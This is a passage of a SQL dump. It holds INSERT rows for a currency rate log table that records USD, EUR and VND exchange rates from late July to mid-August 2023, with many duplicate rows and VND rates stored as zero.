(7339, 1, 'USD', 1.000000, 2, 'EUR', 0.901230, '2023-07-25'),
(7340, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-25'),
(7341, 2, 'EUR', 1.000000, 1, 'USD', 1.109600, '2023-07-25'),
(7342, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-25'),
(7343, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-25'),
(7344, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-25'),
(7345, 1, 'USD', 0.000000, 2, 'EUR', 0.901230, '2023-07-25'),
(7346, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-25'),
(7347, 2, 'EUR', 0.000000, 1, 'USD', 1.109600, '2023-07-25'),
(7348, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-25'),
(7349, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-25'),
(7350, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-25'),
(7351, 1, 'USD', 1.000000, 2, 'EUR', 0.901230, '2023-07-26'),
(7352, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-26'),
(7353, 2, 'EUR', 1.000000, 1, 'USD', 1.109600, '2023-07-26'),
(7354, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-26'),
(7355, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-26'),
(7356, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-26'),
(7357, 1, 'USD', 0.000000, 2, 'EUR', 0.904900, '2023-07-26'),
(7358, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-26'),
(7359, 2, 'EUR', 0.000000, 1, 'USD', 1.105100, '2023-07-26'),
(7360, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-26'),
(7361, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-26'),
(7362, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-26'),
(7363, 1, 'USD', 1.000000, 2, 'EUR', 0.904900, '2023-07-26'),
(7364, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-26'),
(7365, 2, 'EUR', 1.000000, 1, 'USD', 1.105100, '2023-07-26'),
(7366, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-26'),
(7367, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-26'),
(7368, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-26'),
(7369, 1, 'USD', 0.000000, 2, 'EUR', 0.904900, '2023-07-26'),
(7370, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-26'),
(7371, 2, 'EUR', 0.000000, 1, 'USD', 1.105100, '2023-07-26'),
(7372, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-26'),
(7373, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-26'),
(7374, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-26'),
(7375, 1, 'USD', 1.000000, 2, 'EUR', 0.904900, '2023-07-26'),
(7376, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-26'),
(7377, 2, 'EUR', 1.000000, 1, 'USD', 1.105100, '2023-07-26'),
(7378, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-26'),
(7379, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-26'),
(7380, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-26'),
(7381, 1, 'USD', 0.000000, 2, 'EUR', 0.904900, '2023-07-26'),
(7382, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-26'),
(7383, 2, 'EUR', 0.000000, 1, 'USD', 1.105100, '2023-07-26'),
(7384, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-26'),
(7385, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-26'),
(7386, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-26'),
(7387, 1, 'USD', 1.000000, 2, 'EUR', 0.904900, '2023-07-26'),
(7388, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-26'),
(7389, 2, 'EUR', 1.000000, 1, 'USD', 1.105100, '2023-07-26'),
(7390, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-26'),
(7391, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-26'),
(7392, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-26'),
(7393, 1, 'USD', 0.000000, 2, 'EUR', 0.904900, '2023-07-26'),
(7394, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-26'),
(7395, 2, 'EUR', 0.000000, 1, 'USD', 1.105100, '2023-07-26'),
(7396, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-26'),
(7397, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-26'),
(7398, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-26'),
(7399, 1, 'USD', 1.000000, 2, 'EUR', 0.904900, '2023-07-27'),
(7400, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-27'),
(7401, 2, 'EUR', 1.000000, 1, 'USD', 1.105100, '2023-07-27'),
(7402, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-27'),
(7403, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-27'),
(7404, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-27'),
(7405, 1, 'USD', 0.000000, 2, 'EUR', 0.904240, '2023-07-27'),
(7406, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-27'),
(7407, 2, 'EUR', 0.000000, 1, 'USD', 1.105900, '2023-07-27'),
(7408, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-27'),
(7409, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-27'),
(7410, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-27'),
(7411, 1, 'USD', 1.000000, 2, 'EUR', 0.904240, '2023-07-27'),
(7412, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-27'),
(7413, 2, 'EUR', 1.000000, 1, 'USD', 1.105900, '2023-07-27'),
(7414, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-27'),
(7415, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-27'),
(7416, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-27'),
(7417, 1, 'USD', 0.000000, 2, 'EUR', 0.904240, '2023-07-27'),
(7418, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-27'),
(7419, 2, 'EUR', 0.000000, 1, 'USD', 1.105900, '2023-07-27'),
(7420, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-27'),
(7421, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-27'),
(7422, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-27'),
(7423, 1, 'USD', 1.000000, 2, 'EUR', 0.904240, '2023-07-27'),
(7424, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-27'),
(7425, 2, 'EUR', 1.000000, 1, 'USD', 1.105900, '2023-07-27'),
(7426, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-27'),
(7427, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-27'),
(7428, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-27'),
(7429, 1, 'USD', 0.000000, 2, 'EUR', 0.904240, '2023-07-27'),
(7430, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-27'),
(7431, 2, 'EUR', 0.000000, 1, 'USD', 1.105900, '2023-07-27'),
(7432, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-27'),
(7433, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-27'),
(7434, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-27'),
(7435, 1, 'USD', 1.000000, 2, 'EUR', 0.904240, '2023-07-27'),
(7436, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-27'),
(7437, 2, 'EUR', 1.000000, 1, 'USD', 1.105900, '2023-07-27'),
(7438, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-27'),
(7439, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-27'),
(7440, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-27'),
(7441, 1, 'USD', 0.000000, 2, 'EUR', 0.904240, '2023-07-27'),
(7442, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-27'),
(7443, 2, 'EUR', 0.000000, 1, 'USD', 1.105900, '2023-07-27'),
(7444, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-27'),
(7445, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-27'),
(7446, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-27'),
(7447, 1, 'USD', 1.000000, 2, 'EUR', 0.904240, '2023-07-28'),
(7448, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-28'),
(7449, 2, 'EUR', 1.000000, 1, 'USD', 1.105900, '2023-07-28'),
(7450, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-28'),
(7451, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-28'),
(7452, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-28'),
(7453, 1, 'USD', 0.000000, 2, 'EUR', 0.898880, '2023-07-28'),
(7454, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-28'),
(7455, 2, 'EUR', 0.000000, 1, 'USD', 1.112500, '2023-07-28'),
(7456, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-28'),
(7457, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-28'),
(7458, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-28'),
(7459, 1, 'USD', 1.000000, 2, 'EUR', 0.898880, '2023-07-28'),
(7460, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-28'),
(7461, 2, 'EUR', 1.000000, 1, 'USD', 1.112500, '2023-07-28'),
(7462, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-28'),
(7463, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-28'),
(7464, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-28'),
(7465, 1, 'USD', 0.000000, 2, 'EUR', 0.898880, '2023-07-28'),
(7466, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-28'),
(7467, 2, 'EUR', 0.000000, 1, 'USD', 1.112500, '2023-07-28'),
(7468, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-28'),
(7469, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-28'),
(7470, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-28'),
(7471, 1, 'USD', 1.000000, 2, 'EUR', 0.898880, '2023-07-28'),
(7472, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-28'),
(7473, 2, 'EUR', 1.000000, 1, 'USD', 1.112500, '2023-07-28'),
(7474, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-28'),
(7475, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-28'),
(7476, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-28'),
(7477, 1, 'USD', 0.000000, 2, 'EUR', 0.898880, '2023-07-28'),
(7478, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-28'),
(7479, 2, 'EUR', 0.000000, 1, 'USD', 1.112500, '2023-07-28'),
(7480, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-28'),
(7481, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-28'),
(7482, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-28'),
(7483, 1, 'USD', 1.000000, 2, 'EUR', 0.898880, '2023-07-28'),
(7484, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-28'),
(7485, 2, 'EUR', 1.000000, 1, 'USD', 1.112500, '2023-07-28'),
(7486, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-28'),
(7487, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-28'),
(7488, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-28');
INSERT INTO `tblcurrency_rate_logs` (`id`, `from_currency_id`, `from_currency_name`, `from_currency_rate`, `to_currency_id`, `to_currency_name`, `to_currency_rate`, `date`) VALUES
(7489, 1, 'USD', 0.000000, 2, 'EUR', 0.898880, '2023-07-28'),
(7490, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-28'),
(7491, 2, 'EUR', 0.000000, 1, 'USD', 1.112500, '2023-07-28'),
(7492, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-28'),
(7493, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-28'),
(7494, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-28'),
(7495, 1, 'USD', 1.000000, 2, 'EUR', 0.898880, '2023-07-29'),
(7496, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-29'),
(7497, 2, 'EUR', 1.000000, 1, 'USD', 1.112500, '2023-07-29'),
(7498, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-29'),
(7499, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-29'),
(7500, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-29'),
(7501, 1, 'USD', 0.000000, 2, 'EUR', 0.908270, '2023-07-29'),
(7502, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-29'),
(7503, 2, 'EUR', 0.000000, 1, 'USD', 1.101000, '2023-07-29'),
(7504, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-29'),
(7505, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-29'),
(7506, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-29'),
(7507, 1, 'USD', 1.000000, 2, 'EUR', 0.908270, '2023-07-29'),
(7508, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-29'),
(7509, 2, 'EUR', 1.000000, 1, 'USD', 1.101000, '2023-07-29'),
(7510, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-29'),
(7511, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-29'),
(7512, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-29'),
(7513, 1, 'USD', 0.000000, 2, 'EUR', 0.908270, '2023-07-29'),
(7514, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-29'),
(7515, 2, 'EUR', 0.000000, 1, 'USD', 1.101000, '2023-07-29'),
(7516, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-29'),
(7517, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-29'),
(7518, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-29'),
(7519, 1, 'USD', 1.000000, 2, 'EUR', 0.908270, '2023-07-29'),
(7520, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-29'),
(7521, 2, 'EUR', 1.000000, 1, 'USD', 1.101000, '2023-07-29'),
(7522, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-29'),
(7523, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-29'),
(7524, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-29'),
(7525, 1, 'USD', 0.000000, 2, 'EUR', 0.908270, '2023-07-29'),
(7526, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-29'),
(7527, 2, 'EUR', 0.000000, 1, 'USD', 1.101000, '2023-07-29'),
(7528, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-29'),
(7529, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-29'),
(7530, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-29'),
(7531, 1, 'USD', 1.000000, 2, 'EUR', 0.908270, '2023-07-29'),
(7532, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-29'),
(7533, 2, 'EUR', 1.000000, 1, 'USD', 1.101000, '2023-07-29'),
(7534, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-29'),
(7535, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-29'),
(7536, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-29'),
(7537, 1, 'USD', 0.000000, 2, 'EUR', 0.908270, '2023-07-29'),
(7538, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-29'),
(7539, 2, 'EUR', 0.000000, 1, 'USD', 1.101000, '2023-07-29'),
(7540, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-29'),
(7541, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-29'),
(7542, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-29'),
(7543, 1, 'USD', 1.000000, 2, 'EUR', 0.908270, '2023-07-30'),
(7544, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-30'),
(7545, 2, 'EUR', 1.000000, 1, 'USD', 1.101000, '2023-07-30'),
(7546, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-30'),
(7547, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-30'),
(7548, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-30'),
(7549, 1, 'USD', 0.000000, 2, 'EUR', 0.908270, '2023-07-30'),
(7550, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-30'),
(7551, 2, 'EUR', 0.000000, 1, 'USD', 1.101000, '2023-07-30'),
(7552, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-30'),
(7553, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-30'),
(7554, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-30'),
(7555, 1, 'USD', 1.000000, 2, 'EUR', 0.908270, '2023-07-30'),
(7556, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-30'),
(7557, 2, 'EUR', 1.000000, 1, 'USD', 1.101000, '2023-07-30'),
(7558, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-30'),
(7559, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-30'),
(7560, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-30'),
(7561, 1, 'USD', 0.000000, 2, 'EUR', 0.908270, '2023-07-30'),
(7562, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-30'),
(7563, 2, 'EUR', 0.000000, 1, 'USD', 1.101000, '2023-07-30'),
(7564, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-30'),
(7565, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-30'),
(7566, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-30'),
(7567, 1, 'USD', 1.000000, 2, 'EUR', 0.908270, '2023-07-30'),
(7568, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-30'),
(7569, 2, 'EUR', 1.000000, 1, 'USD', 1.101000, '2023-07-30'),
(7570, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-30'),
(7571, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-30'),
(7572, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-30'),
(7573, 1, 'USD', 0.000000, 2, 'EUR', 0.908270, '2023-07-30'),
(7574, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-30'),
(7575, 2, 'EUR', 0.000000, 1, 'USD', 1.101000, '2023-07-30'),
(7576, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-30'),
(7577, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-30'),
(7578, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-30'),
(7579, 1, 'USD', 1.000000, 2, 'EUR', 0.908270, '2023-07-30'),
(7580, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-30'),
(7581, 2, 'EUR', 1.000000, 1, 'USD', 1.101000, '2023-07-30'),
(7582, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-30'),
(7583, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-30'),
(7584, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-30'),
(7585, 1, 'USD', 0.000000, 2, 'EUR', 0.908270, '2023-07-30'),
(7586, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-30'),
(7587, 2, 'EUR', 0.000000, 1, 'USD', 1.101000, '2023-07-30'),
(7588, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-30'),
(7589, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-30'),
(7590, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-30'),
(7591, 1, 'USD', 1.000000, 2, 'EUR', 0.908270, '2023-08-09'),
(7592, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-09'),
(7593, 2, 'EUR', 1.000000, 1, 'USD', 1.101000, '2023-08-09'),
(7594, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-09'),
(7595, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-09'),
(7596, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-09'),
(7597, 1, 'USD', 0.000000, 2, 'EUR', 0.913740, '2023-08-09'),
(7598, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-09'),
(7599, 2, 'EUR', 0.000000, 1, 'USD', 1.094400, '2023-08-09'),
(7600, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-09'),
(7601, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-09'),
(7602, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-09'),
(7603, 1, 'USD', 1.000000, 2, 'EUR', 0.913740, '2023-08-09'),
(7604, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-09'),
(7605, 2, 'EUR', 1.000000, 1, 'USD', 1.094400, '2023-08-09'),
(7606, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-09'),
(7607, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-09'),
(7608, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-09'),
(7609, 1, 'USD', 0.000000, 2, 'EUR', 0.913740, '2023-08-09'),
(7610, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-09'),
(7611, 2, 'EUR', 0.000000, 1, 'USD', 1.094400, '2023-08-09'),
(7612, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-09'),
(7613, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-09'),
(7614, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-09'),
(7615, 1, 'USD', 1.000000, 2, 'EUR', 0.913740, '2023-08-09'),
(7616, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-09'),
(7617, 2, 'EUR', 1.000000, 1, 'USD', 1.094400, '2023-08-09'),
(7618, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-09'),
(7619, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-09'),
(7620, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-09'),
(7621, 1, 'USD', 0.000000, 2, 'EUR', 0.913740, '2023-08-09'),
(7622, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-09'),
(7623, 2, 'EUR', 0.000000, 1, 'USD', 1.094400, '2023-08-09'),
(7624, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-09'),
(7625, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-09'),
(7626, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-09'),
(7627, 1, 'USD', 1.000000, 2, 'EUR', 0.913740, '2023-08-09'),
(7628, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-09'),
(7629, 2, 'EUR', 1.000000, 1, 'USD', 1.094400, '2023-08-09'),
(7630, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-09'),
(7631, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-09'),
(7632, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-09'),
(7633, 1, 'USD', 0.000000, 2, 'EUR', 0.913740, '2023-08-09'),
(7634, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-09'),
(7635, 2, 'EUR', 0.000000, 1, 'USD', 1.094400, '2023-08-09'),
(7636, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-09'),
(7637, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-09'),
(7638, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-09'),
(7639, 1, 'USD', 1.000000, 2, 'EUR', 0.913740, '2023-08-10'),
(7640, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-10'),
(7641, 2, 'EUR', 1.000000, 1, 'USD', 1.094400, '2023-08-10'),
(7642, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-10'),
(7643, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-10'),
(7644, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-10'),
(7645, 1, 'USD', 0.000000, 2, 'EUR', 0.911740, '2023-08-10'),
(7646, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-10'),
(7647, 2, 'EUR', 0.000000, 1, 'USD', 1.096800, '2023-08-10'),
(7648, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-10'),
(7649, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-10'),
(7650, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-10'),
(7651, 1, 'USD', 1.000000, 2, 'EUR', 0.911740, '2023-08-10'),
(7652, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-10'),
(7653, 2, 'EUR', 1.000000, 1, 'USD', 1.096800, '2023-08-10'),
(7654, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-10'),
(7655, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-10'),
(7656, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-10'),
(7657, 1, 'USD', 0.000000, 2, 'EUR', 0.911740, '2023-08-10'),
(7658, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-10'),
(7659, 2, 'EUR', 0.000000, 1, 'USD', 1.096800, '2023-08-10'),
(7660, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-10'),
(7661, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-10'),
(7662, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-10'),
(7663, 1, 'USD', 1.000000, 2, 'EUR', 0.911740, '2023-08-10'),
(7664, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-10'),
(7665, 2, 'EUR', 1.000000, 1, 'USD', 1.096800, '2023-08-10'),
(7666, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-10'),
(7667, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-10'),
(7668, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-10'),
(7669, 1, 'USD', 0.000000, 2, 'EUR', 0.911740, '2023-08-10'),
(7670, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-10'),
(7671, 2, 'EUR', 0.000000, 1, 'USD', 1.096800, '2023-08-10'),
(7672, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-10'),
(7673, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-10'),
(7674, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-10'),
(7675, 1, 'USD', 1.000000, 2, 'EUR', 0.911740, '2023-08-10'),
(7676, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-10'),
(7677, 2, 'EUR', 1.000000, 1, 'USD', 1.096800, '2023-08-10'),
(7678, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-10'),
(7679, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-10'),
(7680, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-10'),
(7681, 1, 'USD', 0.000000, 2, 'EUR', 0.911740, '2023-08-10'),
(7682, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-10'),
(7683, 2, 'EUR', 0.000000, 1, 'USD', 1.096800, '2023-08-10'),
(7684, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-10'),
(7685, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-10'),
(7686, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-10'),
(7687, 1, 'USD', 1.000000, 2, 'EUR', 0.911740, '2023-08-11'),
